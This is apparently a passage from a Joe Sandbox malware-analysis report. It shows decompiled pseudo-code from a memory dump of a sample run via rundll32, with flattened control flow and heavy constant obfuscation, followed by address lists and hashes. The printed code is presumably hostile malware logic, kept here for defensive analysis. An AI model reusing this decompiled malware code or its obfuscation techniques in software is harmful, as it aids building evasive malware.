                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t798 = 0x7e670bc;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t931 == 0x2dbd64b) {
                                                                                                                      											return E002C4DAD(_v2860, _v2868, _v2616, _v2740, _v2748);
                                                                                                                      										}
                                                                                                                      										if(_t931 == 0x63d9dbc) {
                                                                                                                      											_push(_t858);
                                                                                                                      											E002BEA7B( &_v524, _v2788, _v2888, _t858, _v2844, _v2920, _v2864);
                                                                                                                      											_t937 =  &(_t937[7]);
                                                                                                                      											_t931 = 0xc6ce6ce;
                                                                                                                      											while(1) {
                                                                                                                      												L1:
                                                                                                                      												_t798 = 0x7e670bc;
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											if(_t931 != 0x7253c5e) {
                                                                                                                      												goto L24;
                                                                                                                      											} else {
                                                                                                                      												_t858 = _v2760;
                                                                                                                      												_t930 = E002CC9A9(_v2928, _v2896, _v2624, _v2724, _v2620);
                                                                                                                      												_t937 =  &(_t937[4]);
                                                                                                                      												_t798 = 0x7e670bc;
                                                                                                                      												_t931 =  !=  ? 0x7e670bc : 0x97d4d6b;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      									L28:
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L27:
                                                                                                                      							return _t812;
                                                                                                                      							goto L28;
                                                                                                                      						}
                                                                                                                      						__eflags = _t931 - _t798;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							_push(_v2784);
                                                                                                                      							_push(_v2680);
                                                                                                                      							_push(0x2b190c);
                                                                                                                      							E002CD37B(E002BAB66(_v2672, _v2776, __eflags), __eflags, _v2664, _t930, _v2672, _v2892,  &_v524,  &_v1044,  &_v2604, _v2768);
                                                                                                                      							E002BAE03(_v2736, _v2756, _v2876, _t799);
                                                                                                                      							_t937 =  &(_t937[0xd]);
                                                                                                                      							_t931 = 0x1e136d2;
                                                                                                                      							_t798 = 0x7e670bc;
                                                                                                                      							goto L24;
                                                                                                                      						} else {
                                                                                                                      							__eflags = _t931 - 0x97d4d6b;
                                                                                                                      							if(_t931 == 0x97d4d6b) {
                                                                                                                      								E002B68DE(_v2688, _v2696, _v2792, _v2704, _v2624);
                                                                                                                      								_t937 =  &(_t937[3]);
                                                                                                                      								_t931 = 0x2dbd64b;
                                                                                                                      								goto L1;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t931 - 0xaab8dea;
                                                                                                                      								if(_t931 == 0xaab8dea) {
                                                                                                                      									E002B777B(_v2712,  &_v2624,  &_v2616, _v2800, _v2900, _v2720);
                                                                                                                      									_t937 =  &(_t937[4]);
                                                                                                                      									asm("sbb esi, esi");
                                                                                                                      									_t931 = (_t931 & 0x04496613) + 0x2dbd64b;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										_t798 = 0x7e670bc;
                                                                                                                      										goto L2;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t931 - 0xc6ce6ce;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										goto L24;
                                                                                                                      									} else {
                                                                                                                      										E002D12A8(_t858, _v2628, __eflags, _v2880, _v2904,  &_v2084);
                                                                                                                      										 *((short*)(E002C4FA8(_v2632,  &_v2084, _v2692, _v2840))) = 0;
                                                                                                                      										E002B8650(_v2684,  &_v1564, __eflags, _v2832);
                                                                                                                      										_push(_v2640);
                                                                                                                      										_push(_v2676);
                                                                                                                      										_push(0x2b181c);
                                                                                                                      										E002BE7CE(E002BAB66(_v2932, _v2940, __eflags), __eflags, _v2816,  &_v2084, _v2932, _v2644, _v2668, _v2824, _v2648,  &_v1564);
                                                                                                                      										E002BAE03(_v2916, _v2728, _v2924, _t825);
                                                                                                                      										_t858 = _v2856;
                                                                                                                      										_t812 = E002CC38F(_t858,  &_v2604, _t936, _v2908);
                                                                                                                      										_t937 =  &(_t937[0x15]);
                                                                                                                      										__eflags = _t812;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t931 = 0x9f9f0c;
                                                                                                                      											while(1) {
                                                                                                                      												L1:
                                                                                                                      												_t798 = 0x7e670bc;
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L27;
                                                                                                                      						L24:
                                                                                                                      						__eflags = _t931 - 0xd142a7e;
                                                                                                                      					} while (__eflags != 0);
                                                                                                                      					return _t798;
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x002b4990
                                                                                                                      0x002b499b
                                                                                                                      0x002b49a3
                                                                                                                      0x002b49a8
                                                                                                                      0x002b49b0
                                                                                                                      0x002b49b8
                                                                                                                      0x002b49c0
                                                                                                                      0x002b49c8
                                                                                                                      0x002b49d0
                                                                                                                      0x002b49d5
                                                                                                                      0x002b49dd
                                                                                                                      0x002b49e5
                                                                                                                      0x002b49f0
                                                                                                                      0x002b49f8
                                                                                                                      0x002b4a03
                                                                                                                      0x002b4a16
                                                                                                                      0x002b4a1d
                                                                                                                      0x002b4a28
                                                                                                                      0x002b4a33
                                                                                                                      0x002b4a3e
                                                                                                                      0x002b4a49
                                                                                                                      0x002b4a54
                                                                                                                      0x002b4a5f
                                                                                                                      0x002b4a67
                                                                                                                      0x002b4a72
                                                                                                                      0x002b4a7d
                                                                                                                      0x002b4a88
                                                                                                                      0x002b4a93
                                                                                                                      0x002b4a9e
                                                                                                                      0x002b4aa9
                                                                                                                      0x002b4ab4
                                                                                                                      0x002b4abf
                                                                                                                      0x002b4ad2
                                                                                                                      0x002b4ad9
                                                                                                                      0x002b4ae4
                                                                                                                      0x002b4aec
                                                                                                                      0x002b4af9
                                                                                                                      0x002b4b02
                                                                                                                      0x002b4b03
                                                                                                                      0x002b4b07
                                                                                                                      0x002b4b0f
                                                                                                                      0x002b4b1a
                                                                                                                      0x002b4b22
                                                                                                                      0x002b4b2d
                                                                                                                      0x002b4b3a
                                                                                                                      0x002b4b3e
                                                                                                                      0x002b4b43
                                                                                                                      0x002b4b4b
                                                                                                                      0x002b4b53
                                                                                                                      0x002b4b61
                                                                                                                      0x002b4b65
                                                                                                                      0x002b4b6d
                                                                                                                      0x002b4b75
                                                                                                                      0x002b4b7d
                                                                                                                      0x002b4b82
                                                                                                                      0x002b4b8a
                                                                                                                      0x002b4b94
                                                                                                                      0x002b4b9c
                                                                                                                      0x002b4bb0
                                                                                                                      0x002b4bb5
                                                                                                                      0x002b4bbc
                                                                                                                      0x002b4bc7
                                                                                                                      0x002b4bdc
                                                                                                                      0x002b4bee
                                                                                                                      0x002b4bf5
                                                                                                                      0x002b4c00
                                                                                                                      0x002b4c0b
                                                                                                                      0x002b4c12
                                                                                                                      0x002b4c1d
                                                                                                                      0x002b4c2f
                                                                                                                      0x002b4c34
                                                                                                                      0x002b4c3d
                                                                                                                      0x002b4c48
                                                                                                                      0x002b4c53
                                                                                                                      0x002b4c65
                                                                                                                      0x002b4c68
                                                                                                                      0x002b4c6f
                                                                                                                      0x002b4c7a
                                                                                                                      0x002b4c85
                                                                                                                      0x002b4c90
                                                                                                                      0x002b4c98
                                                                                                                      0x002b4ca3
                                                                                                                      0x002b4cab
                                                                                                                      0x002b4cb0
                                                                                                                      0x002b4cb8
                                                                                                                      0x002b4cc0
                                                                                                                      0x002b4cc8
                                                                                                                      0x002b4cdb
                                                                                                                      0x002b4cea
                                                                                                                      0x002b4cf1
                                                                                                                      0x002b4cfc
                                                                                                                      0x002b4d0f
                                                                                                                      0x002b4d16
                                                                                                                      0x002b4d21
                                                                                                                      0x002b4d2c
                                                                                                                      0x002b4d34
                                                                                                                      0x002b4d3c
                                                                                                                      0x002b4d47
                                                                                                                      0x002b4d52
                                                                                                                      0x002b4d5d
                                                                                                                      0x002b4d68
                                                                                                                      0x002b4d73
                                                                                                                      0x002b4d7e
                                                                                                                      0x002b4d89
                                                                                                                      0x002b4d94
                                                                                                                      0x002b4d9f
                                                                                                                      0x002b4daa
                                                                                                                      0x002b4db5
                                                                                                                      0x002b4dc0
                                                                                                                      0x002b4dcb
                                                                                                                      0x002b4dd6
                                                                                                                      0x002b4dde
                                                                                                                      0x002b4de6
                                                                                                                      0x002b4df1
                                                                                                                      0x002b4df9
                                                                                                                      0x002b4e06
                                                                                                                      0x002b4e0b
                                                                                                                      0x002b4e11
                                                                                                                      0x002b4e19
                                                                                                                      0x002b4e21
                                                                                                                      0x002b4e2c
                                                                                                                      0x002b4e34
                                                                                                                      0x002b4e3f
                                                                                                                      0x002b4e4a
                                                                                                                      0x002b4e5c
                                                                                                                      0x002b4e61
                                                                                                                      0x002b4e6a
                                                                                                                      0x002b4e75
                                                                                                                      0x002b4e7d
                                                                                                                      0x002b4e86
                                                                                                                      0x002b4e8b
                                                                                                                      0x002b4e96
                                                                                                                      0x002b4e97
                                                                                                                      0x002b4e9b
                                                                                                                      0x002b4ea3
                                                                                                                      0x002b4eab
                                                                                                                      0x002b4eb3
                                                                                                                      0x002b4ebb
                                                                                                                      0x002b4ec3
                                                                                                                      0x002b4ecb
                                                                                                                      0x002b4ed6
                                                                                                                      0x002b4ee1
                                                                                                                      0x002b4eec
                                                                                                                      0x002b4ef7
                                                                                                                      0x002b4f02
                                                                                                                      0x002b4f0d
                                                                                                                      0x002b4f20
                                                                                                                      0x002b4f27
                                                                                                                      0x002b4f32
                                                                                                                      0x002b4f3d
                                                                                                                      0x002b4f48
                                                                                                                      0x002b4f53
                                                                                                                      0x002b4f5e
                                                                                                                      0x002b4f72
                                                                                                                      0x002b4f79
                                                                                                                      0x002b4f84
                                                                                                                      0x002b4f8f
                                                                                                                      0x002b4f97
                                                                                                                      0x002b4f9c
                                                                                                                      0x002b4fa1
                                                                                                                      0x002b4fa9
                                                                                                                      0x002b4fb1
                                                                                                                      0x002b4fbc
                                                                                                                      0x002b4fc7
                                                                                                                      0x002b4fd2
                                                                                                                      0x002b4fdf
                                                                                                                      0x002b4fe8
                                                                                                                      0x002b4fec
                                                                                                                      0x002b4ff4
                                                                                                                      0x002b4ffc
                                                                                                                      0x002b500f
                                                                                                                      0x002b501e
                                                                                                                      0x002b5025
                                                                                                                      0x002b5030
                                                                                                                      0x002b503b
                                                                                                                      0x002b5046
                                                                                                                      0x002b5051
                                                                                                                      0x002b505e
                                                                                                                      0x002b5072
                                                                                                                      0x002b5077
                                                                                                                      0x002b5080
                                                                                                                      0x002b508b
                                                                                                                      0x002b5093
                                                                                                                      0x002b509b
                                                                                                                      0x002b50a8
                                                                                                                      0x002b50ab
                                                                                                                      0x002b50af
                                                                                                                      0x002b50b7
                                                                                                                      0x002b50c2
                                                                                                                      0x002b50cd
                                                                                                                      0x002b50d8
                                                                                                                      0x002b50e3
                                                                                                                      0x002b50ee
                                                                                                                      0x002b50f6
                                                                                                                      0x002b5101
                                                                                                                      0x002b510c
                                                                                                                      0x002b5117
                                                                                                                      0x002b512d
                                                                                                                      0x002b5134
                                                                                                                      0x002b513f
                                                                                                                      0x002b5147
                                                                                                                      0x002b514f
                                                                                                                      0x002b5154
                                                                                                                      0x002b515c
                                                                                                                      0x002b516e
                                                                                                                      0x002b5173
                                                                                                                      0x002b517c
                                                                                                                      0x002b5187
                                                                                                                      0x002b5194
                                                                                                                      0x002b5197
                                                                                                                      0x002b519b
                                                                                                                      0x002b51a3
                                                                                                                      0x002b51ab
                                                                                                                      0x002b51bb
                                                                                                                      0x002b51bf
                                                                                                                      0x002b51c7
                                                                                                                      0x002b51cc

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &Xbm$'X$04$6R$KO!$X$kM}$kM}$kM}$w3
                                                                                                                      • API String ID: 0-3270913840
                                                                                                                      • Opcode ID: c3e1e34826e4ae0452a8f5d079b8427d3a531a984fe855557324116575347219
                                                                                                                      • Instruction ID: 9901be7d61df2ca4830c859b7332e924b4259590b8d4a42d54ec67287dff8fa7
                                                                                                                      • Opcode Fuzzy Hash: c3e1e34826e4ae0452a8f5d079b8427d3a531a984fe855557324116575347219
                                                                                                                      • Instruction Fuzzy Hash: 1382FF71508380DBD378CF61C98AB9BBBE2BBC4344F10891DE5D99A260D7B59958CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E002C1831(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				char _v8;
                                                                                                                      				char _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				char _v20;
                                                                                                                      				char _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t670;
                                                                                                                      				void* _t736;
                                                                                                                      				void* _t738;
                                                                                                                      				void* _t739;
                                                                                                                      				intOrPtr _t745;
                                                                                                                      				void* _t746;
                                                                                                                      				void* _t749;
                                                                                                                      				void* _t759;
                                                                                                                      				void* _t765;
                                                                                                                      				signed int _t772;
                                                                                                                      				signed int _t773;
                                                                                                                      				signed int _t774;
                                                                                                                      				signed int _t775;
                                                                                                                      				signed int _t776;
                                                                                                                      				signed int _t777;
                                                                                                                      				signed int _t778;
                                                                                                                      				signed int _t779;
                                                                                                                      				signed int _t780;
                                                                                                                      				signed int _t781;
                                                                                                                      				signed int _t782;
                                                                                                                      				signed int _t783;
                                                                                                                      				signed int _t784;
                                                                                                                      				signed int _t785;
                                                                                                                      				signed int _t786;
                                                                                                                      				signed int _t787;
                                                                                                                      				signed int _t788;
                                                                                                                      				void* _t789;
                                                                                                                      				void* _t859;
                                                                                                                      				signed int _t876;
                                                                                                                      				void* _t877;
                                                                                                                      				signed int _t879;
                                                                                                                      				void* _t880;
                                                                                                                      				void* _t883;
                                                                                                                      				void* _t884;
                                                                                                                      				void* _t885;
                                                                                                                      				void* _t891;
                                                                                                                      
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(0x20);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E002BCF25(_t670);
                                                                                                                      				_v276 = 0xaaffe7;
                                                                                                                      				_t885 = _t884 + 0x20;
                                                                                                                      				_t883 = 0;
                                                                                                                      				_t765 = 0x92c7fbc;
                                                                                                                      				_t772 = 0x5f;
                                                                                                                      				_v276 = _v276 * 0x57;
                                                                                                                      				_v276 = _v276 * 0x22;
                                                                                                                      				_v276 = _v276 / _t772;
                                                                                                                      				_v276 = _v276 ^ 0x01ef6b71;
                                                                                                                      				_v80 = 0xefa32d;
                                                                                                                      				_v80 = _v80 + 0x395c;
                                                                                                                      				_v80 = _v80 ^ 0x00efdc89;
                                                                                                                      				_v208 = 0x14a646;
                                                                                                                      				_v208 = _v208 ^ 0x03e947f6;
                                                                                                                      				_t773 = 0x33;
                                                                                                                      				_v208 = _v208 * 7;
                                                                                                                      				_v208 = _v208 >> 7;
                                                                                                                      				_v208 = _v208 ^ 0x0037e257;
                                                                                                                      				_v108 = 0x55608a;
                                                                                                                      				_v108 = _v108 ^ 0x27d6d008;
                                                                                                                      				_v108 = _v108 + 0x510f;
                                                                                                                      				_v108 = _v108 ^ 0x27840191;
                                                                                                                      				_v224 = 0xd82d5c;
                                                                                                                      				_v224 = _v224 | 0x75fffbda;
                                                                                                                      				_v224 = _v224 + 0xb67d;
                                                                                                                      				_v224 = _v224 ^ 0x7600b65b;
                                                                                                                      				_v248 = 0x5f7a1e;
                                                                                                                      				_v248 = _v248 << 2;
                                                                                                                      				_v248 = _v248 / _t773;
                                                                                                                      				_v248 = _v248 << 0xc;
                                                                                                                      				_v248 = _v248 ^ 0x77d07000;
                                                                                                                      				_v28 = 0xb2098a;
                                                                                                                      				_v28 = _v28 ^ 0xa6106b4f;
                                                                                                                      				_v28 = _v28 ^ 0xa6a262c5;
                                                                                                                      				_v288 = 0xdf0886;
                                                                                                                      				_v288 = _v288 ^ 0xb20bba38;
                                                                                                                      				_v288 = _v288 + 0xffff058c;
                                                                                                                      				_t774 = 0x55;
                                                                                                                      				_v288 = _v288 / _t774;
                                                                                                                      				_v288 = _v288 ^ 0x021a95be;
                                                                                                                      				_v40 = 0x709b38;
                                                                                                                      				_v40 = _v40 * 0x4c;
                                                                                                                      				_v40 = _v40 ^ 0x216e14a0;
                                                                                                                      				_v128 = 0x325f64;
                                                                                                                      				_v128 = _v128 | 0xcbf69bed;
                                                                                                                      				_v128 = _v128 ^ 0x5f1c2ec7;
                                                                                                                      				_v128 = _v128 ^ 0x94eaf12a;
                                                                                                                      				_v252 = 0x1f8c2d;
                                                                                                                      				_v252 = _v252 * 0x26;
                                                                                                                      				_v252 = _v252 << 9;
                                                                                                                      				_v252 = _v252 | 0x352a9659;
                                                                                                                      				_v252 = _v252 ^ 0x7dbfde59;
                                                                                                                      				_v52 = 0xb64530;
                                                                                                                      				_v52 = _v52 + 0xffff220f;
                                                                                                                      				_v52 = _v52 ^ 0x00b5673f;
                                                                                                                      				_v88 = 0x1eb517;
                                                                                                                      				_v88 = _v88 + 0x4a10;
                                                                                                                      				_v88 = _v88 ^ 0x00179ba4;
                                                                                                                      				_v152 = 0x6dcdd2;
                                                                                                                      				_v152 = _v152 >> 0xd;
                                                                                                                      				_v152 = _v152 ^ 0x9b988486;
                                                                                                                      				_v152 = _v152 ^ 0x9b92820d;
                                                                                                                      				_v292 = 0x1f7420;
                                                                                                                      				_v292 = _v292 + 0xffff8acf;
                                                                                                                      				_v292 = _v292 + 0xbea;
                                                                                                                      				_v292 = _v292 << 0x10;
                                                                                                                      				_v292 = _v292 ^ 0x0ad85b60;
                                                                                                                      				_v96 = 0xe183f;
                                                                                                                      				_v96 = _v96 + 0xffffe0b5;
                                                                                                                      				_v96 = _v96 ^ 0x0006a2b5;
                                                                                                                      				_v168 = 0xbc531d;
                                                                                                                      				_v168 = _v168 + 0x1044;
                                                                                                                      				_v168 = _v168 << 8;
                                                                                                                      				_v168 = _v168 ^ 0xbc6aad42;
                                                                                                                      				_v48 = 0xac758b;
                                                                                                                      				_t775 = 0xa;
                                                                                                                      				_v48 = _v48 * 0x77;
                                                                                                                      				_v48 = _v48 ^ 0x5023fd0d;
                                                                                                                      				_v236 = 0x67d513;
                                                                                                                      				_v236 = _v236 / _t775;
                                                                                                                      				_v236 = _v236 | 0x579eaf6c;
                                                                                                                      				_v236 = _v236 ^ 0x8e50ee8d;
                                                                                                                      				_v236 = _v236 ^ 0xd9c1be3e;
                                                                                                                      				_v136 = 0xfa6994;
                                                                                                                      				_v136 = _v136 | 0x0e19192c;
                                                                                                                      				_v136 = _v136 >> 8;
                                                                                                                      				_v136 = _v136 ^ 0x000b81a6;
                                                                                                                      				_v104 = 0xfa7815;
                                                                                                                      				_v104 = _v104 + 0xfffffd57;
                                                                                                                      				_v104 = _v104 | 0xf8b7ad9b;
                                                                                                                      				_v104 = _v104 ^ 0xf8f20afa;
                                                                                                                      				_v196 = 0x8e2a42;
                                                                                                                      				_t776 = 0x1d;
                                                                                                                      				_v196 = _v196 / _t776;
                                                                                                                      				_v196 = _v196 + 0xffff8133;
                                                                                                                      				_v196 = _v196 << 4;
                                                                                                                      				_v196 = _v196 ^ 0x00494cf1;
                                                                                                                      				_v284 = 0x1a2960;
                                                                                                                      				_v284 = _v284 << 7;
                                                                                                                      				_v284 = _v284 << 1;
                                                                                                                      				_t777 = 0x7a;
                                                                                                                      				_v284 = _v284 / _t777;
                                                                                                                      				_v284 = _v284 ^ 0x00394215;
                                                                                                                      				_v268 = 0x43d89f;
                                                                                                                      				_v268 = _v268 + 0xffff7f02;
                                                                                                                      				_v268 = _v268 * 0x63;
                                                                                                                      				_v268 = _v268 ^ 0x1173969c;
                                                                                                                      				_v268 = _v268 ^ 0x0b729cb1;
                                                                                                                      				_v228 = 0xa5ecf3;
                                                                                                                      				_v228 = _v228 >> 0xd;
                                                                                                                      				_v228 = _v228 + 0xffff2d40;
                                                                                                                      				_v228 = _v228 + 0xffff09c3;
                                                                                                                      				_v228 = _v228 ^ 0xfffc6095;
                                                                                                                      				_v160 = 0xb4fa1d;
                                                                                                                      				_v160 = _v160 * 0x4b;
                                                                                                                      				_v160 = _v160 >> 0xa;
                                                                                                                      				_v160 = _v160 ^ 0x0003d5ef;
                                                                                                                      				_v36 = 0xfd760e;
                                                                                                                      				_v36 = _v36 | 0xcf12de5e;
                                                                                                                      				_v36 = _v36 ^ 0xcff8d2d3;
                                                                                                                      				_v260 = 0x7426f9;
                                                                                                                      				_v260 = _v260 + 0x2744;
                                                                                                                      				_v260 = _v260 | 0xa7f1812e;
                                                                                                                      				_v260 = _v260 >> 0xc;
                                                                                                                      				_v260 = _v260 ^ 0x0001adb7;
                                                                                                                      				_v204 = 0x2b40b;
                                                                                                                      				_t879 = 0x72;
                                                                                                                      				_v204 = _v204 / _t879;
                                                                                                                      				_t778 = 0xf;
                                                                                                                      				_v204 = _v204 / _t778;
                                                                                                                      				_t779 = 0x79;
                                                                                                                      				_v204 = _v204 * 0x1e;
                                                                                                                      				_v204 = _v204 ^ 0x000520e0;
                                                                                                                      				_v84 = 0xeaa539;
                                                                                                                      				_v84 = _v84 + 0xffff8f42;
                                                                                                                      				_v84 = _v84 ^ 0x00e48483;
                                                                                                                      				_v124 = 0xa185d5;
                                                                                                                      				_v124 = _v124 << 8;
                                                                                                                      				_v124 = _v124 >> 3;
                                                                                                                      				_v124 = _v124 ^ 0x143f3fdc;
                                                                                                                      				_v92 = 0xa97737;
                                                                                                                      				_v92 = _v92 ^ 0xeb9ba296;
                                                                                                                      				_v92 = _v92 ^ 0xeb365c56;
                                                                                                                      				_v132 = 0xbd678a;
                                                                                                                      				_v132 = _v132 + 0x8717;
                                                                                                                      				_v132 = _v132 | 0xacb35e9c;
                                                                                                                      				_v132 = _v132 ^ 0xacb35ba6;
                                                                                                                      				_v68 = 0x976f37;
                                                                                                                      				_v68 = _v68 + 0xffff737a;
                                                                                                                      				_v68 = _v68 ^ 0x00925dc3;
                                                                                                                      				_v200 = 0x3716ae;
                                                                                                                      				_v200 = _v200 * 0x3d;
                                                                                                                      				_v200 = _v200 + 0x7c18;
                                                                                                                      				_v200 = _v200 / _t779;
                                                                                                                      				_v200 = _v200 ^ 0x00164f5a;
                                                                                                                      				_v116 = 0x90307;
                                                                                                                      				_v116 = _v116 + 0xffff7314;
                                                                                                                      				_t780 = 0x73;
                                                                                                                      				_v116 = _v116 / _t780;
                                                                                                                      				_v116 = _v116 ^ 0x000cd282;
                                                                                                                      				_v76 = 0x344fd1;
                                                                                                                      				_v76 = _v76 | 0x7db0f0e8;
                                                                                                                      				_v76 = _v76 ^ 0x7db1d9db;
                                                                                                                      				_v216 = 0x1a88b7;
                                                                                                                      				_v216 = _v216 + 0xffff5c3b;
                                                                                                                      				_v216 = _v216 + 0xffff2820;
                                                                                                                      				_t876 = 9;
                                                                                                                      				_v216 = _v216 / _t876;
                                                                                                                      				_v216 = _v216 ^ 0x000cec9e;
                                                                                                                      				_v100 = 0x3ced92;
                                                                                                                      				_v100 = _v100 + 0xffff1312;
                                                                                                                      				_v100 = _v100 + 0xffffd55c;
                                                                                                                      				_v100 = _v100 ^ 0x00361c3b;
                                                                                                                      				_v184 = 0x789494;
                                                                                                                      				_v184 = _v184 + 0xffff0c7f;
                                                                                                                      				_v184 = _v184 << 1;
                                                                                                                      				_v184 = _v184 | 0x402d3e8e;
                                                                                                                      				_v184 = _v184 ^ 0x40e21003;
                                                                                                                      				_v192 = 0x310378;
                                                                                                                      				_v192 = _v192 << 0xb;
                                                                                                                      				_t781 = 0x22;
                                                                                                                      				_v192 = _v192 * 3;
                                                                                                                      				_v192 = _v192 + 0xffff6836;
                                                                                                                      				_v192 = _v192 ^ 0x985d636a;
                                                                                                                      				_v244 = 0xaa43bf;
                                                                                                                      				_v244 = _v244 / _t879;
                                                                                                                      				_v244 = _v244 << 0xf;
                                                                                                                      				_v244 = _v244 << 0xa;
                                                                                                                      				_v244 = _v244 ^ 0xb200e8c6;
                                                                                                                      				_v188 = 0xd75c86;
                                                                                                                      				_v188 = _v188 << 9;
                                                                                                                      				_v188 = _v188 | 0x025244f6;
                                                                                                                      				_v188 = _v188 * 0x59;
                                                                                                                      				_v188 = _v188 ^ 0xd553b68a;
                                                                                                                      				_v144 = 0x6e01bd;
                                                                                                                      				_v144 = _v144 ^ 0x0f7c0b9c;
                                                                                                                      				_v144 = _v144 / _t781;
                                                                                                                      				_v144 = _v144 ^ 0x007182e2;
                                                                                                                      				_v156 = 0xaeb978;
                                                                                                                      				_t782 = 0x1e;
                                                                                                                      				_v156 = _v156 / _t782;
                                                                                                                      				_v156 = _v156 + 0xffff8ee7;
                                                                                                                      				_v156 = _v156 ^ 0x000c354b;
                                                                                                                      				_v232 = 0x8c6aee;
                                                                                                                      				_v232 = _v232 ^ 0x1b23a9db;
                                                                                                                      				_v232 = _v232 + 0x8ee1;
                                                                                                                      				_v232 = _v232 + 0x44;
                                                                                                                      				_v232 = _v232 ^ 0x1bb20ffb;
                                                                                                                      				_v240 = 0xc4628c;
                                                                                                                      				_v240 = _v240 >> 0xd;
                                                                                                                      				_t783 = 0x6e;
                                                                                                                      				_v240 = _v240 / _t783;
                                                                                                                      				_v240 = _v240 + 0x5eea;
                                                                                                                      				_v240 = _v240 ^ 0x000cb0fe;
                                                                                                                      				_v64 = 0xd4a535;
                                                                                                                      				_v64 = _v64 ^ 0x78f16673;
                                                                                                                      				_v64 = _v64 ^ 0x7824c526;
                                                                                                                      				_v256 = 0x55d7a8;
                                                                                                                      				_v256 = _v256 ^ 0x05430866;
                                                                                                                      				_v256 = _v256 | 0xfffce0d7;
                                                                                                                      				_v256 = _v256 ^ 0xfff12a33;
                                                                                                                      				_v164 = 0xd10b34;
                                                                                                                      				_v164 = _v164 + 0xffffcbea;
                                                                                                                      				_v164 = _v164 + 0xffff01f2;
                                                                                                                      				_v164 = _v164 ^ 0x00ca8dd0;
                                                                                                                      				_v264 = 0x73bd71;
                                                                                                                      				_v264 = _v264 << 0xe;
                                                                                                                      				_v264 = _v264 >> 7;
                                                                                                                      				_v264 = _v264 << 0xa;
                                                                                                                      				_v264 = _v264 ^ 0x7ae6d472;
                                                                                                                      				_v172 = 0xd09f93;
                                                                                                                      				_v172 = _v172 + 0xffffeac5;
                                                                                                                      				_v172 = _v172 << 5;
                                                                                                                      				_v172 = _v172 ^ 0x1a1189dc;
                                                                                                                      				_v272 = 0xce1f77;
                                                                                                                      				_t784 = 0x5f;
                                                                                                                      				_v272 = _v272 / _t784;
                                                                                                                      				_t785 = 0x47;
                                                                                                                      				_v272 = _v272 * 0xd;
                                                                                                                      				_v272 = _v272 << 5;
